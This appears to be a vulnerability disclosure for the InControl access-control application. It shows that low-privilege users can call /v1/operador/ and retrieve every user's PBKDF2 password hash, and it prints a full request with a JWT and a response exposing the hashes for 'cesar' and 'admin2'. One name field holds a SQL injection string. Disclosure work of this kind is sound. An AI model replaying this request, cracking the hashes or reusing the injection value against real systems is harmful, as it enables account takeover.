| Descripción | There is a Password Hash disclosure in the InControl application. There are three types of users: Admin, Recepcionista and Porteiro. Every type of user can make a GET request in the users "/v1/operador/" endpoint, which lists every user registered in the application. This endpoint returns a JSON object that contains a lot of information about the users, including id, username, password (hashed), and other informations.
Here is an example of the GET request with Recepcionista privileges (which in the frontend it doesn't have permission to list users):
GET /v1/operador/ HTTP/1.1
Host: localhost:4441
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozLCJ1c2VybmFtZSI6ImNlc2FyIiwiZXhwIjoxNzQ3NTAzODE4LCJlbWFpbCI6IiIsImlzX2FjdGl2ZSI6dHJ1ZSwiaXNfc3VwZXJ1c2VyIjpmYWxzZSwicGVzc29hIjp7Im5vbWUiOiJhcm5hbGRvIn0sInBlcm1pc3Npb25zIjp7ImNyZWRlbmNpYWwiOnsiY29udHJvbGVyZW1vdG8iOnsiaWRfcGVybWlzc2FvX3ZpZXciOjI2OH0sImhpc3RvcmljYWxiaW9tZXRyaWFkaWdpdGFsIjp7ImlkX3Blcm1pc3Nhb19hZGQiOjI0OSwiaWRfcGVybWlzc2FvX2NoYW5nZSI6MjUwLCJpZF9wZXJtaXNzYW9fZGVsZXRlIjoyNTEsImlkX3Blcm1pc3Nhb192aWV3IjoyNTJ9fSwiZXZlbnRvX29wZXJhZG9yIjp7Imhpc3RvcmljYWxldmVudG9vcGVyYWRvciI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxODEsImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjE4MiwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTgzLCJpZF9wZXJtaXNzYW9fdmlldyI6MTg0fX0sImdydXBvX3BvbnRvc19hY2Vzc28iOnsiaGlzdG9yaWNhbGdydXBvcG9udG9zYWNlc3NvIjp7ImlkX3Blcm1pc3Nhb19hZGQiOjI5NywiaWRfcGVybWlzc2FvX2NoYW5nZSI6Mjk4LCJpZF9wZXJtaXNzYW9fZGVsZXRlIjoyOTksImlkX3Blcm1pc3Nhb192aWV3IjozMDB9fSwidXN1YXJpbyI6eyJjYW1wb3NwZXJzb25hbGl6YWRvcyI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxMTcsImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjExOCwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTE5LCJpZF9wZXJtaXNzYW9fdmlldyI6MTIwfSwidXNlcnNncm91cCI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxMjksImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjEzMCwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTMxLCJpZF9wZXJtaXNzYW9fdmlldyI6MTMyfX19fQ.RyGjsE61f-d4QE6OWMCyp7Px_DjOEYMhmSGPIiCJzcc
Accept-Language: pt-BR,pt;q=0.9
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
And here is an example of the HTTP response with disclosure of password hashes:
HTTP/1.1 200 OK
Date: Fri, 16 May 2025 19:02:07 GMT
Server: Apache/2.4.62 (Win32) OpenSSL/3.1.6 mod_wsgi/4.7.1 Python/3.7
Vary: Accept,Origin,Cookie
Allow: GET, POST, DELETE, HEAD, OPTIONS
Content-Length: 40484
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
{"message":null,"data":[{"id":3,"pessoa":{"id":5,"nome_completo":"arnaldo","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesar","password":"pbkdf2_sha256$150000$O4xokjpfyafm$L1/My9lbtYx/dcJTOW45QaC2N6qWf2KtIScfaA6FCV0=","groups":{"id":3,"name":"Recepcao","permissions":[{"id":268,"codename":"view_controleremoto","content_type":{"id":67,"app_label":"credencial","model":"controleremoto"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":181,"codename":"add_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":182,"codename":"change_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":183,"codename":"delete_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":184,"codename":"view_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":297,"codename":"add_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":298,"codename":"change_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":299,"codename":"delete_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":300,"codename":"view_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":117,"codename":"add_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":118,"codename":"change_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":119,"codename":"delete_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":120,"codename":"view_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":129,"codename":"add_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":130,"codename":"change_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":131,"codename":"delete_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":132,"codename":"view_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}}]},"is_active":true,"is_superuser":false}},{"id":2,"pessoa":{"id":4,"nome_completo":"' OR '1'='1'--","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":2,"username":"admin2","password":"pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262, |
|---|